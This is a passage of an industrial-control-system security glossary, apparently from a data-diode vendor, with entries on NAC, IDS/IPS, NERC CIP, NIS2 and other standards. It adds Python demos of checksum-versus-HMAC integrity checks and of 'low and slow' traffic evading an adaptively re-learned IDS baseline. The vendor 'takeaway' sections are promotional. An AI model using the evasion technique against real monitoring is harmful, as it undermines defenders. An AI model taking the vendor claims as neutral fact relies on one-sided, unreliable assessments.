Linux is a free, open-source operating system kernel created by Linus Torvalds in 1991. It forms the foundation for many operating systems (Linux distributions) and powers everything from servers and smartphones to embedded devices. Linux is known for its stability, security, and customizability.
Machinery Regulation (EU) 2023/1230 (Regulation)
What is it: Includes health and safety requirements considering cybersecurity for manufacturing in the EU.
Relevancy to Unidirectional Gateways: Indirectly relevant as it addresses machinery safety, which could involve cybersecurity measures like unidirectional gateways.
Source: EUR-Lex
Malware
Software that is specifically designed to disrupt, damage, or gain unauthorized access to a computer system.
MD5
MD5 (Message Digest Algorithm 5) is a cryptographic hash function that produces a 128-bit hash value. While historically used for digital signatures and file integrity verification, it’s now considered cryptographically broken and unsuitable for security applications due to vulnerability to collision attacks.
MES - Manufacturing Execution System
A software system that monitors and manages the production process in a manufacturing plant:
Purpose: To optimize the manufacturing process by tracking, documenting, and controlling the entire production lifecycle
MIS - Management Information Systems
MIS (Management Information System) is a software system that collects, processes, and organizes business data to support management decisions. It helps organizations track performance metrics, workflows, and resources to improve operational efficiency and strategic planning, especially with today’s increasingly remote workforce.
Modem
A modulator-demodulator, commonly referred to as a modem, is a computer hardware device that converts data from a digital format into a format suitable for an analog transmission medium such as telephone or radio.
NERC
North American Electric Reliability Corporation (NERC) is a not-for-profit international regulatory authority whose mission is to assure the effective and efficient reduction of risks to the reliability and security of the grid.
Network Access Control (NAC)
What they are: Any system that restricts participation in network communications to approved devices. The most common such technologies are built into managed switches. These switches restrict communications through the switch to devices with approved MAC addresses.
Intrinsic Limitations: NAC systems are software and contain vulnerabilities that may be exploited. NAC is not considered a strong security control suitable for partitioning safety-critical or reliability-critical networks from less-critical networks, but can be useful for reducing errors where equipment is connected to critical networks incorrectly. The simplest way to attack most NAC systems is to steal the password and reconfigure the system.
Network Encryption and Authentication
What they are: Encryption and cryptographic authentication are tools used to protect communications sessions from man-in-the-middle attacks. In these attacks, an attacker who has access to the communications system steals information, such as passwords, from the communications; injects malicious commands into the communications; “hijacks” the communications session by taking the place of one of the endpoints; or otherwise impersonates a legitimate endpoint. Encryption is a mathematical algorithm that combines plain text with keys in such a way as to produce encrypted text that is indecipherable without the keys but can be turned back into the original plain text by a recipient who has the right keys. Cryptographic authentication is a tamper-detecting “signature” that can be appended to messages, much like conventional error-detecting checksums, with the difference that it cannot be recomputed by a party who does not hold the key.
Where to use: While there is a clear consensus that encryption and authentication are essential when communicating across the Internet, there is less consensus in OT environments. Some experts recommend that these cryptographic measures be deployed throughout industrial control systems, from the very lowest to the very highest levels. Other experts observe that this is most often impractical, because of the difficulty of managing encryption keys in these challenging environments. At this writing, practical key management tools for industrial networks exist in only very limited domains – there is no such thing as a cross-vendor, cross-platform encryption and key management tool that can be used for IP network communications, serial communications, and every other kind of communications in an industrial automation system.
Intrinsic Limitations: The simplest way to defeat cryptosystems is to steal the key information. More fundamentally, all cryptosystems are software and thus have vulnerabilities, both discovered and undiscovered. By far the most common way to defeat cryptosystems is neither of the aforementioned, but rather to compromise an endpoint of the encrypted communications and use that endpoint to pivot attacks inside of encrypted, authenticated communications to other devices the compromised endpoint can communicate with legitimately.
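An added example (not code from the glossary or from any vendor) illustrating the checksum-versus-signature point above: an unkeyed CRC-32 trailer and a keyed HMAC-SHA256 trailer are appended to a constructed control message, and only the keyed one detects a substituted payload. The key, message contents and frame layout are all assumptions made for the example.

```python
"""Checksum vs. keyed MAC on a constructed control message: both catch accidental
corruption, only the keyed MAC catches deliberate substitution, because anyone on
the path can recompute a CRC but cannot compute an HMAC without the shared key."""
import hashlib
import hmac
import zlib

# Constructed shared secret for this example only; real deployments depend on the
# key-management tooling the glossary entry notes is scarce in industrial networks.
SHARED_KEY = b"example-only-shared-key-for-demo"

TAG_LEN_CRC = 4
TAG_LEN_HMAC = hashlib.sha256().digest_size   # 32 bytes


def crc_frame(payload: bytes) -> bytes:
    """Append an unkeyed CRC-32 trailer (error detection only)."""
    return payload + zlib.crc32(payload).to_bytes(TAG_LEN_CRC, "big")


def crc_verify(frame: bytes) -> bool:
    payload, tag = frame[:-TAG_LEN_CRC], frame[-TAG_LEN_CRC:]
    return zlib.crc32(payload).to_bytes(TAG_LEN_CRC, "big") == tag


def hmac_frame(payload: bytes, key: bytes = SHARED_KEY) -> bytes:
    """Append a keyed HMAC-SHA256 trailer (tamper detection)."""
    return payload + hmac.new(key, payload, hashlib.sha256).digest()


def hmac_verify(frame: bytes, key: bytes = SHARED_KEY) -> bool:
    payload, tag = frame[:-TAG_LEN_HMAC], frame[-TAG_LEN_HMAC:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)   # constant-time comparison


def flip_bit(frame: bytes, index: int) -> bytes:
    """Simulate line noise: flip one bit of the frame at the given byte index."""
    b = bytearray(frame)
    b[index] ^= 0x01
    return bytes(b)


ORIGINAL = b"SET valve_17 opening=40"    # constructed command message
SUBSTITUTE = b"SET valve_17 opening=95"  # a different command of the same shape


def compare_integrity_checks() -> dict:
    """Return, per check, whether the trailer catches that kind of change."""
    return {
        # Accidental corruption is caught by both trailers.
        "crc_catches_bitflip": not crc_verify(flip_bit(crc_frame(ORIGINAL), 4)),
        "hmac_catches_bitflip": not hmac_verify(flip_bit(hmac_frame(ORIGINAL), 4)),
        # A substituted payload with a freshly computed CRC verifies fine: the
        # receiver cannot tell it was not produced by the legitimate endpoint.
        "crc_accepts_substitution": crc_verify(crc_frame(SUBSTITUTE)),
        # Without SHARED_KEY, a tag computed under any other key is rejected.
        "hmac_rejects_substitution": not hmac_verify(
            hmac_frame(SUBSTITUTE, key=b"not-the-shared-key")),
    }


if __name__ == "__main__":
    for check, caught in compare_integrity_checks().items():
        print(f"{check}: {caught}")
```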
Network Intrusion Detection Systems
What they are: Network IDS look at network packets exchanged on a wire or fibre via a tap or exchanged within a managed network switch via a mirror / SPAN port. Signature-based systems match packet contents or sequences of packets and contents against rules / signatures looking for a match. When a match is found, an alert is generated warning of a potential attack in progress. Anomaly-based systems use “machine learning” to look at patterns of communications and raise alerts when unusual changes are detected in these patterns. Vendors compete on patterns, and common patterns include traffic volume, volume per type of connection, sources and destinations of connections, new / unrecognized equipment connected to the network, and which PLC or device registers are being read from or written to. Many Network IDS products have built-in asset inventory features.
Where to use: Network intrusion detection systems are recommended for most industrial networks, and for IT networks for that matter. We can only optimize what we measure, and so monitoring and measuring what is going on with network communications provides important insights. And if our protective measures fail, Network IDS gives us some hope of detecting attacks in progress and triggering incident response actions before we suffer unacceptable consequences.
Intrinsic Limitations: All network IDS are software, with vulnerabilities known and unknown that can be exploited. Signature-based IDS can only detect “old” attacks – attacks that vendors have seen already and for which signatures have been produced, distributed, and installed. Anomaly-based IDS can detect attacks that “look” suspicious with respect to the characteristics the IDS is monitoring / learning. Attacks that “look” normal can go unreported. And false alarms / false positives are a bane of all IDS systems. System administrators often need to “tune” IDS systems to eliminate false alarms. “Low and slow” attacks can defeat IDS as well – attacks that change the “normal” behavior of compromised assets over time so slowly that normal machine learning and false alarm elimination processes “tune out” the attack indicators. All IDS are also susceptible to alert flooding attacks, where the attacker creates a “noisy” distraction in another part of the business that creates many high-priority alerts while pursuing the attacker’s real objective creating only a few low-priority alerts. And in the end, fast attacks risk bringing about unacceptable consequences despite IDS, because human or even automated incident response is too slow to prevent the consequence.
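An added example (not code from the glossary or from any IDS vendor) putting the signature-based and anomaly-based detection described above side by side over constructed Modbus/TCP flow summaries, and reproducing the “low and slow” limitation: a baseline that keeps re-learning from live traffic to suppress false alarms tunes out a ramp that a frozen baseline catches. Host addresses, the “engineering hosts may write” policy and the traffic volumes are all assumptions made for the example.

```python
"""Toy network IDS: signature rules plus a per-source volume anomaly detector
over constructed flow records, with a demonstration of 'low and slow' evasion
against an adaptive (continuously re-learned) baseline."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev

# Constructed asset inventory (hypothetical addresses, not from any real plant).
KNOWN_HOSTS = {"10.0.1.10", "10.0.1.11", "10.0.1.20"}
ENGINEERING_HOSTS = {"10.0.1.20"}        # policy: only these may write to PLCs
MODBUS_WRITE_FUNCS = {5, 6, 15, 16}      # Modbus write function codes


@dataclass(frozen=True)
class Flow:
    """One connection summary, as a tap/SPAN-port sensor might report it."""
    src: str
    dst: str
    proto: str      # "modbus", "https", ...
    func: int       # Modbus function code, 0 when not applicable
    nbytes: int     # bytes sent by src during the observation window


def per_source_bytes(flows):
    totals = defaultdict(int)
    for f in flows:
        totals[f.src] += f.nbytes
    return dict(totals)


def signature_alerts(flows):
    """Signature-based detection: fixed rules, so only already-known patterns match."""
    alerts = []
    for f in flows:
        if (f.proto == "modbus" and f.func in MODBUS_WRITE_FUNCS
                and f.src not in ENGINEERING_HOSTS):
            alerts.append(("HIGH", f"Modbus write (func {f.func}) to {f.dst} "
                                   f"from non-engineering host {f.src}"))
        if f.src not in KNOWN_HOSTS:
            alerts.append(("MEDIUM", f"unrecognized host {f.src} on the network"))
    return alerts


class VolumeAnomalyDetector:
    """Anomaly-based detection on per-source bytes per window.

    adaptive=True keeps re-learning the baseline from live traffic (what an
    operator 'tuning out' false alarms amounts to); adaptive=False freezes it."""

    def __init__(self, k=3.0, adaptive=False):
        self.k = k
        self.adaptive = adaptive
        self.history = defaultdict(list)   # src -> bytes seen in past windows

    def learn(self, flows):
        for src, total in per_source_bytes(flows).items():
            self.history[src].append(total)

    def check(self, flows):
        alerts = []
        for src, total in per_source_bytes(flows).items():
            hist = self.history[src]
            if len(hist) >= 3:
                mu, sd = mean(hist), pstdev(hist)
                if total > mu + self.k * max(sd, 1.0):   # floor avoids sd == 0
                    alerts.append(("LOW", f"{src} sent {total} bytes, "
                                          f"baseline {mu:.0f} +/- {sd:.0f}"))
            if self.adaptive:
                hist.append(total)
        return alerts


# Ten constructed training windows for the PLC poller 10.0.1.10 (mean 1000 bytes).
BASELINE_WINDOWS = [980, 1010, 995, 1020, 1000, 990, 1015, 985, 1005, 1000]


def trained_detector(adaptive):
    det = VolumeAnomalyDetector(k=3.0, adaptive=adaptive)
    for n in BASELINE_WINDOWS:
        det.learn([Flow("10.0.1.10", "10.0.1.50", "modbus", 3, n)])  # func 3 = read
    return det


def burst_alerts():
    """A sudden 5x volume jump is obvious to either kind of baseline."""
    return trained_detector(adaptive=False).check(
        [Flow("10.0.1.10", "10.0.1.50", "modbus", 3, 5000)])


def low_and_slow_escapes(adaptive, windows=60):
    """Grow 10.0.1.10's volume by 1% per window; True if no alert ever fires."""
    det = trained_detector(adaptive)
    vol = 1000
    for _ in range(windows):
        vol += vol // 100
        if det.check([Flow("10.0.1.10", "10.0.1.50", "modbus", 3, vol)]):
            return False
    return True


SAMPLE_WINDOW = [                                         # constructed traffic
    Flow("10.0.1.20", "10.0.1.50", "modbus", 16, 400),   # engineering write: allowed
    Flow("10.0.1.11", "10.0.1.50", "modbus", 6, 120),    # operator host writing: rule hit
    Flow("10.0.1.99", "10.0.1.50", "modbus", 3, 80),     # host not in inventory
]

if __name__ == "__main__":
    for sev, msg in signature_alerts(SAMPLE_WINDOW):
        print(sev, msg)
    print("burst caught:", bool(burst_alerts()))
    print("1%/window ramp escapes frozen baseline:", low_and_slow_escapes(False))
    print("1%/window ramp escapes re-learned baseline:", low_and_slow_escapes(True))
```

With the frozen baseline the ramp trips the threshold in its fourth window; with the re-learned baseline the threshold rises along with the traffic and no alert fires in sixty windows.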
Network Intrusion Prevention Systems
What they are: Network IPS include network IDS. When the IDS function detects and reports a high-priority attack, the IPS function engages to interrupt the attack in progress. An external IPS may send TCP “reset” packets back into the tap or mirror port the IPS is using to access the packet stream. An in-line IPS built into a firewall can simply start dropping packets on the connection(s) involved in the attack so that further attack packets do not reach the target machine or network. Other attack interruption mechanisms are possible, such as contacting an agent installed on a host that is the endpoint of the attack and instructing that agent to drop the connection or take other protective actions.
Where to use: With all IPS products there is a risk of false alarms / false positives causing the IPS to interrupt benign communications, communications that may be essential to safe or reliable operations. Common wisdom is that IPS are deployed only at the very highest levels of control systems, such as on the IT/OT interface, where false alarms are likely to have only business consequences, not physical consequences. Network IPS that are designed for industrial environments though, generally have had their attack interruption actions tested and approved by vendors and engineering teams, so that even false alarms have only acceptable consequences.
Intrinsic Limitations: All network IPS are software, with vulnerabilities known and unknown that can be exploited. All network IPS include a network IDS, and so are subject to all the limitations of network IDS systems.
NERC CIP (Regulation)
What is it?: The electric power sector leads both North American industry and the world in strong cyber-security standards. Both the NEI and NRC standards in nuclear generation and the North American Electric Reliability Corporation’s Critical Infrastructure Protection (NERC CIP) standards in the Bulk Electric System (BES) are seen as among the most demanding cyber-security regimes enforced anywhere in the world. The NERC CIP standards in particular are seen as a model of cyber security for other industries and critical infrastructures. The NERC CIP V5 standards are designed specifically to enhance the reliability of the Bulk Electric System through strong security.
Relevancy to Unidirectional Gateways: The CIP V5 standards recognize that Unidirectional Security Gateways provide security which is stronger than firewalls, and position the gateways as an alternative to firewalls and costly Network Intrusion Detection Systems (NIDS). The V5 CIP standards have 103 requirements overall, and provide exemptions from 37 Medium-Impact requirements and 5 High-Impact requirements when Waterfall’s Unidirectional Security Gateways are used to protect an Electronic Security Perimeter (ESP) rather than firewalls and NIDS. Unidirectional Security Gateways increase the security of critical control systems, simplify and reduce the ongoing cost of CIP V5 compliance programs, and eliminate the need to use high-maintenance firewalls and NIDS.
Waterfall’s takeaway: Waterfall’s Unidirectional Security Gateways are deployed widely in Bulk Electric Systems, especially in power generation applications. The strong security provided by these gateways is recognized by steadily increasing numbers of industry analysts and security experts. In short, the Bulk Electric System is becoming measurably safer, more secure and more reliable as a result of the widespread deployment of Unidirectional Security Gateways.
Source: NERC CIP Cheatsheet
Network Scan
A network scan is a process that identifies active devices on a network and gathers information about them.
Network Segmentation
A network security technique that divides a computer network into smaller, more manageable subnetworks. The goal of network segmentation is to improve network performance and security by controlling how traffic flows between the subnetworks. Network administrators can apply different security policies and protocols to each subnet.
NIS2 Directive (Directive)
What is it: The NIS2 Directive is an updated EU cybersecurity law that builds on the original NIS Directive (NISD). The goals of NIS2 are to boost cybersecurity, simplify reporting, and create consistent rules and penalties across the EU. By expanding its scope, NIS2 requires more businesses and sectors to take cybersecurity measures, with the ultimate goal of enhancing Europe’s cybersecurity in the long run. With stricter rules to overcome previous limitations, NIS2 will impact a wider range of industries. Entities under NIS2 are classified as essential or important, and the directive outlines security requirements as well as a process for incident reporting.
Relevancy to Unidirectional Gateways: Potentially relevant as it covers EU-wide cybersecurity legislation that may encompass unidirectional gateways for critical sectors.
Waterfall’s takeaway: Articles 21 and 23 are the two primary articles in the NIS2 Directive that OT professionals need to act upon: Article 21 covers management of cyber risk, while Article 23 covers reporting. The Directive specifically outlines the penalties for non-compliance with these two articles: the maximum fine is €10,000,000 or 2% of global annual turnover from the previous year. NIS2 includes additional sectors: space, wastewater, public administrations, data center service providers, trust service providers, content delivery networks, and public electronic communications networks and services. Other critical sectors, including postal services, chemicals, and the manufacturing of key products, are also mandated to comply with the regulations. NIS2 imposes direct obligations on management bodies concerning compliance with the legislation. Manufacturing is now under NIS2; this sector is the second-largest target of ransomware attacks with tangible consequences.
Source: EUR-Lex
NISC The Basic Policy of Critical Information Infrastructure Protection (Japanese Policy)
What is it: The Basic Policy of Critical Information Infrastructure Protection is a basic shared policy which outlines responsibilities for the government and guidance for operators of critical infrastructure concerning the protection of critical information infrastructure. Its purpose is to instruct stakeholders to protect critical infrastructure by reducing the risk of IT outages and ensuring prompt recovery after an event. It outlines basic safety principles, information sharing, incident response, risk management and continuous improvement of critical information infrastructure protection. The policy does not acknowledge or recommend any specific type of technology and maintains that the most current and robust technology be leveraged.
Relevancy to Unidirectional Gateways: The unique and unusual part of this standard is in the annexes at the end of the document. As the goal of the document is to “prevent serious effects on the public welfare and socioeconomic activities due to IT outages”, Annex 1 lists all of the specific categories of CII sectors, the applicable operators, the critical control systems and examples of IT outages. Annex 2 goes a step further with “CII Service and Maintenance Levels”. In it, certain maintenance levels and standards are to be maintained at all times. Certain failures in control systems due to IT outages are not allowed to take place. The level of failures is extremely strict, making it seemingly impossible to have any interconnection between control systems and enterprise systems. For example, for electric power supply services “no supply problem incidents of over 10 minutes for supply power of 100,000 kw or more should occur”, and for gas supply services, “no supply problem incidents effecting supply to 20 or more houses should occur as a result of IT outages”. For water systems it is even more strict: “no interruption or decrease of water supply, abnormal quality water supply or serious problems in systems should be caused for supply of water as a result of suspended IT failures”. These stringent standards of service maintenance levels go on for each CII industry sector.
Waterfall’s takeaway: It could be interesting to see how the authors of this policy would go about answering the question of how to ensure these service maintenance levels through different cyber security technology options. For service maintenance levels as strict as these, unidirectional gateway technology would be an appropriate solution.
Source: nisc.go.jp
NIST Framework for Improving Critical Infrastructure Cybersecurity (Standard)
What is it: A “risk-based approach to managing cybersecurity risk”. This framework provides guidance to industry and organizations on managing cybersecurity risk. Critical infrastructure is not a predefined set of industries but rather any system or asset vital enough to the United States that, if compromised, it would result in a debilitating impact on national security, the economy, and/or public health and safety.
Relevancy to Unidirectional Gateways: The Framework is neutral when it comes to technology. It provides a mechanism for organizations to describe current and future cybersecurity postures, improvement processes and assessment, and communication plans to stakeholders. The framework is unfortunately weak on prevention, and focuses heavily on five core functions: identify, protect, detect, respond, recover. This is because it views the functions, categories and subcategories of the framework for IT and ICS as identical. The authors have taken a cyber risk framework directly from an IT context and applied it to ICS.
Waterfall’s takeaway: Overall, this is a very IT-focused framework which has been very lightly modified to be applied to industrial control systems. This framework could apply to any organization, which again raises the question: why apply another generic IT model to ICS? Understanding what is most important to protect from cyber attack in ICS, namely safety and control rather than data and information, is the only way we will be able to provide a valuable framework that operators of critical infrastructure can implement.
NIST Special Publication 800-82 Revision 2 Guide to Industrial Control Systems (ICS) Security (Standard)
What is it: Guidance for secure ICS, SCADA, DCS, and other systems performing control functions. The intended audience is ICS communities vital to the operation of US critical infrastructure (90% of which are privately owned and operated).
Relevancy to Unidirectional Gateways: The standard recommends unidirectional gateways to restrict logical access to the ICS network. It also outlines a defense-in-depth strategy for ICS which will ideally use unidirectional gateways to provide logical separation between the corporate and ICS networks. Unidirectional gateways are advised for network segmentation and boundary protection. Separating an ICS in a high-security domain from the corporate network is traditionally best achieved through unidirectional gateway technology, which restricts communications between the connected networks to a single direction, thereby segmenting the network. The standard describes unidirectional gateways as a combination of hardware and software which makes it physically impossible to send any information back into the source network, the ICS.
Waterfall’s takeaway: This standard reflects NIST’s sophisticated understanding of the functionality and importance of unidirectional gateways in control system environments. The authors illustrate the dramatic differences in the goals, vulnerabilities, and risks associated with ICS versus the IT environment, knowing full well that these differences warrant different solutions. Unidirectional gateways are mentioned throughout the document to protect the most critical networks and assets of an ICS from the threat of cyber attacks.
Source: Guide to ICS Security (PDF)
NotPetya
On 27 June 2017, a series of powerful cyberattacks using the Petya malware began that swamped the websites of Ukrainian organizations, including banks, ministries, newspapers and electricity firms. Similar infections were reported in France, Germany, Italy, Poland, Russia, the United Kingdom, the United States and Australia. ESET estimated on 28 June 2017 that 80% of all infections were in Ukraine, with Germany second hardest hit with about 9%. On 28 June 2017, the Ukrainian government stated that the attack was halted. On 30 June 2017, the Associated Press reported that experts agreed Petya was masquerading as ransomware while actually being designed to cause maximum damage, with Ukraine as the main target.
NRC - NEI (Regulation, USA)
The Nuclear Regulatory Commission (NRC) regulates commercial nuclear power plants, and other uses of nuclear materials.
What is it?: Developed to aid nuclear facility licensees in developing and implementing their Cyber Security Plan submittal as required by 10 CFR 73.54, Title 10 of the U.S. Code of Federal Regulations 73.54 “Protection of digital computer and communication systems and networks”. 10 CFR 73.54 requires that each licensee operating a nuclear power plant submit a cyber security plan for Commission review and approval. The Plan’s main objective is to safeguard the health and safety of the public from radiological sabotage from a cyber attack up to and including the Design Basis Threat (DBT).
Relevancy to Unidirectional Gateways: Unidirectional communications technology is recommended as an effective cyber security control for communication pathways when developing a cyber security plan protecting “Critical Digital Assets”. It is also recommended as part of a thorough defense-in-depth protective strategy, in which a defensive cybersecurity architecture establishes security boundaries at which digital communications are monitored and restricted. If data flows between networks of different security levels and firewalls are used (a non-deterministic boundary device), the plan must include additional criteria showing that the device complies with the non-deterministic data flow criteria in Section 6 of NEI 08-09. If unidirectional communication technology is used (a deterministic boundary device), the description of the data flow rules can be brief.
Waterfall’s takeaway: Compliance is simplified through the implementation of unidirectional technology. Within a thorough defense-in-depth security architecture, if unidirectional communications technology is implemented as the security boundary control device, the licensee is exempt from 21 minimum security requirements.
Source: nrc.gov
NSA
The National Security Agency/Central Security Service (NSA/CSS) leads the U.S. Government in cryptology that encompasses both signals intelligence (SIGINT) insights and cybersecurity products and services and enables computer network operations to gain a decisive advantage for the nation and her allies.
OPC
Open Platform Communications (originally OLE for Process Control): a family of standards for exchanging data between industrial automation applications and devices from different manufacturers. OPC is a key part of Industry 4.0, the movement towards smart manufacturing. The classic specifications (OPC DA, HDA and A&E) are built on Microsoft COM/DCOM and so are tied to Windows; the current generation, OPC UA (Unified Architecture), is platform-independent, supports semantic data description, and adds built-in security (certificate-based authentication, message signing and encryption) that classic OPC lacks.
OPC-DA
OPC DA, or Open Platform Communications Data Access, is the classic client-server specification for reading and writing process data in real time: an OPC DA server exposes current tag values from devices such as PLCs and RTUs, and clients such as HMIs, SCADA systems, historians and MES/ERP integrations read them and, where permitted, write to them. Because OPC DA runs over DCOM, sessions use TCP port 135 plus dynamically assigned ports (and callbacks from server to client), which makes the protocol notoriously hard to filter with a firewall; this is one reason OPC DA is commonly replicated through a gateway or replaced by OPC UA at zone boundaries.
OPC A&E
OPC Alarms and Events (OPC A&E) is a data communications protocol that allows for the exchange of alarm and event information between OPC servers and clients. OPC A&E data can be used to: Notify operators and management of system issues, Sequence events to optimize operations, Schedule maintenance, and Predict equipment failure.
OPC HDA
OPC Historical Data Access (OPC HDA) is a standard for exchanging and analyzing archived process data: OPC HDA is used for analysis, optimization, inventory control, regulatory compliance, and more.
ONR (UK Plan)
What is it: The Office for Nuclear Regulation (ONR) has stated in its strategic plan that one of the main factors that will influence its regulatory work during 2016 – 2020 is the range of threats “to the security of the nuclear industry, including threats to cyber security” and that it can be “assumed that the capabilities of potential adversaries to operate in cyberspace will continue to grow”. ONR’s work is focused on influencing improvements in nuclear safety and security, and stakeholder confidence. Regarding cyber security, the organisation’s plan is to “develop and publish new guidance for civil sector duty-holders to take full ownership of their security, particularly regarding cyber security, in accordance with modern outcome focused security regulation.”
Source: onr.co.uk (PDF)
Operational Technology (OT)
Hardware and software routinely found on SCADA or “operations” networks. For example: human-machine interfaces, device communications servers, alarm systems, process historian databases, file servers and printers.
Operator
The person using a SCADA system HMI to operate a physical process.
OSHA
OSHA stands for Occupational Safety and Health Administration, an American federal agency that ensures safe and healthy working conditions for employees.
OSIsoft
OSIsoft was a company that developed application software for real-time data management. The company was founded in 1980 by J. Patrick Kennedy and was headquartered in San Leandro, California. In 2021, OSIsoft was acquired by AVEVA, a UK-based industrial software company, for about $5 billion. The software developed by OSIsoft is now known as the AVEVA PI System.
Process Control Network
A Process Control Network is a communications network that transmits data and instructions between control and measurement units, and Supervisory Control and Data Acquisition (SCADA) equipment.
PDF (Portable Document Format)
Portable Document Format (PDF), standardized as ISO 32000, is a file format developed by Adobe in 1992 to present documents, including text formatting and images, in a manner independent of application software, hardware, and operating systems.
The Portable Document Format (PDF) has an interesting history dating back to the early 1990s. In 1991, Adobe co-founder John Warnock began working on what was known as “The Camelot Project.” The goal was to create a file format that could “capture” documents from any application and send electronic versions to “anyone, anywhere,” while maintaining their exact look and formatting. This was a significant challenge at the time, as documents often lost formatting when shared between different computers or platforms.
In 1992, Adobe developed this concept into PDF. The first publicly available PDF tools were Acrobat 1.0 and Adobe Reader (initially called Acrobat Reader), released in 1993. The first version was relatively basic, supporting simple text, basic images, and hyperlinks.
Key features throughout PDF history:
1994 and 1996: PDF 1.1 adds password protection with 40-bit RC4 encryption; PDF 1.2 adds interactive forms (AcroForms) and extended color support
1999: Adobe makes the PDF specification freely available
2001: PDF 1.4 introduces tagged PDF for improved accessibility, along with 128-bit encryption
2001: PDF/X standard is created for the printing industry
2004: PDF 1.6 adds 3D support and multimedia capabilities
2008: PDF is recognized as an open standard (ISO 32000-1:2008)
2017: PDF 2.0 (ISO 32000-2:2017) is released with significant improvements
The format’s major strengths are:
- Platform independence
- Preservation of formatting
- Built-in compression
- Support for digital signatures
- Ability to embed fonts
- Support for metadata
- Security features (password- and certificate-based encryption, usage permissions)
Today, PDF remains the de facto standard for document sharing, particularly in professional and legal contexts. It’s estimated that there are hundreds of billions of PDF documents in existence. The same richness that makes the format useful (embedded JavaScript, embedded files, launch and URI actions, and a large parser surface) is also why PDF attachments are a common malware delivery vehicle and why PDF readers are a frequent patch target; see Phishing and Sandbox.
Perimeter
A logical or physical boundary separating networks of varying levels of criticality and consequence threshold.
See also: cyber perimeter, physical perimeter.
PHA - Process Hazard Analysis
An analysis of an industrial process to identify potential failure points and other factors that could lead to accidents.
Phasor
A complex number (magnitude and phase angle) representing a sinusoidal voltage or current in an electrical system, conventionally drawn as a rotating vector. Synchrophasors are phasors time-stamped against a common clock (usually GPS) so that measurements taken at different substations can be compared directly.
Phishing
Email that seeks to deceive a recipient into opening malware attachments, following malicious links, or divulging credentials.
PII (Personally Identifiable Information)
Personally identifiable information (PII) is information that can identify an individual, either on its own or in combination with other relevant data.
Pivot (attack)
Using a compromised computer to attack other computers, often other computers deeper into layers of networks in a defensive architecture.
PKI (Public Key Infrastructure)
Public Key Infrastructure (PKI) is a system of policies, technologies, and processes that allows for the encryption and signing of data. PKI uses digital certificates to authenticate the identity of users, devices, or services.
PLC
PLC stands for Programmable Logic Controller: a small, ruggedized, solid-state computer that controls and monitors industrial equipment. PLCs are used in industrial control systems (ICSes) to automate tasks such as operating assembly lines, robotic devices, and machines, and are built to run continuously for years with minimal maintenance.
PMU (Power Management Unit / Phasor Measurement Unit)
In electronics, a Power Management Unit (PMU) is an integrated circuit that controls the power supplied to components of a device; also called a power management IC (PMIC), and widely used in mobile devices. In power-grid OT, PMU more often means Phasor Measurement Unit: a device that measures voltage and current phasors time-stamped against GPS and streams them (IEEE C37.118) to a phasor data concentrator for wide-area monitoring.
Practical Case for a Road Tunnel - Part 2 Measures (Guidance, France)
What is it: (2014) The objective of this case study is to illustrate a complete and concrete example: a road tunnel. The first part of this study provides details on the complete method of classification, as such showing how to take certain elements into account. After a presentation of the scope and the context of the case study, the various threats are analysed by specifying the possible links between cybersecurity and dependability. From these threats then stem the likelihood of an attack and therefore the class of each function. Finally, the various possible groupings between classes are compared in order to define the final architecture. The second part of the case study corresponds to the implementation of measures present in the two guides. The architecture retained at the end of the first part is thus analysed macroscopically, with regard to the main measures of the first guide. A proposal for securing the tunnel is then made using the second guide, by starting with the organisational measures followed by the technical measures.
Relevancy to Unidirectional Gateways: Section A9 is entirely devoted to “Diode”. Partitioning ICS: The industrial IS has to be broken down into coherent zones that are physically partitioned, with filtering between zones. Administration must in addition be carried out through the intermediary of a dedicated network that is not connected to the Internet. The unidirectionality of the flows between C3 and the lower classes is provided by a hardware data diode. A hardware data diode has to protect the unidirectional flow from C3 to the management IS. Diode: it is possible to have information transit from a network of a given class to a network of a lower class, but it is imperative to block any command from a lower network to a network of a higher class.
Waterfall Takeaway: This document provides a concrete application of unidirectional gateways as per the guidance in the Cybersecurity for ICS document. Reinforcing the security measure with a real example of an industrial operational network, making a very strong case for Waterfall.
Source: cyber.gouv.fr
Primary Defenses
Defensive measures designed as the first line of defense against attacks.
Process Historian
A database optimized to store and manipulate large amounts of time-sequenced data, such as sensor readings from an industrial process.
Protection Equipment
Industrial devices monitoring sensors in an industrial process, and triggering automatic actions to bring the system back into a safe state when sensors or combinations of sensors ever exceed designated limits. Protection equipment is designed to prevent damage to industrial equipment.
Protective Relay
A device that monitors sensors in an electrical system, and signals an electric breaker to interrupt current to a part of the system when designated limits are exceeded. Protective relays are designed primarily to prevent damage to industrial equipment, and secondarily to protect safety. Many conditions able to pose threats to industrial equipment can also pose threats to personnel safety and environmental integrity.
Quantum Cryptography
Definition: Quantum cryptography leverages the principles of quantum mechanics to create secure communication channels. The most widely known application of quantum cryptography is Quantum Key Distribution (QKD), which uses quantum particles (like photons) to transmit cryptographic keys. Any attempt to intercept or eavesdrop on the communication causes detectable disturbances in the quantum states, alerting the involved parties to the breach.
Importance in Cybersecurity: Sufficiently large quantum computers could break the widely used public-key algorithms RSA and ECC, so key establishment that does not rely on them is an active research area, and quantum cryptography is one candidate. QKD has real limits, though: it distributes keys only (data is still protected by a conventional symmetric cipher such as AES), it needs dedicated optical links or trusted relay nodes, and it still depends on an authenticated classical channel, so it does not remove the need for conventional authentication. For most systems the practical route to the post-quantum era is post-quantum cryptography (PQC): conventional algorithms such as the NIST-standardized ML-KEM and ML-DSA that run on existing hardware and networks, which is also the approach national security agencies such as the NSA and the UK NCSC recommend over QKD.
Example in OT Security: In OT environments, especially in sectors like energy, utilities, and defense, where data confidentiality and system integrity are critical, quantum cryptography could be used to secure communication between control systems and remote sensors. This would ensure that malicious actors cannot intercept, alter, or disrupt operational data, thus protecting critical infrastructure from cyberattacks, even in a world where quantum computing is a reality.
RAT
Remote Administration Tool (or Remote Access Trojan) – Malicious software that provides a remote attacker with administrative privileges on a compromised computer.
Rail Cyber Security: Guidance to Industry (Guidance)
What is it: This guidance is concerned with protecting rail infrastructure and rolling-stock systems and handling threats and incidents. The Department for Transport (DfT) is looking to encourage the use of the US NIST cybersecurity framework amongst UK companies that operate critical infrastructure. Rail systems are becoming more vulnerable to cyber attack due to the integration of open-platform systems, equipment using COTS components and the increased prevalence of control and automation systems that can be accessed remotely via public and private networks. The guidance applies to all rail networks in Great Britain, including high speed heavy rail, conventional heavy rail, London Underground, Docklands Light Railway and Glasgow Subway.
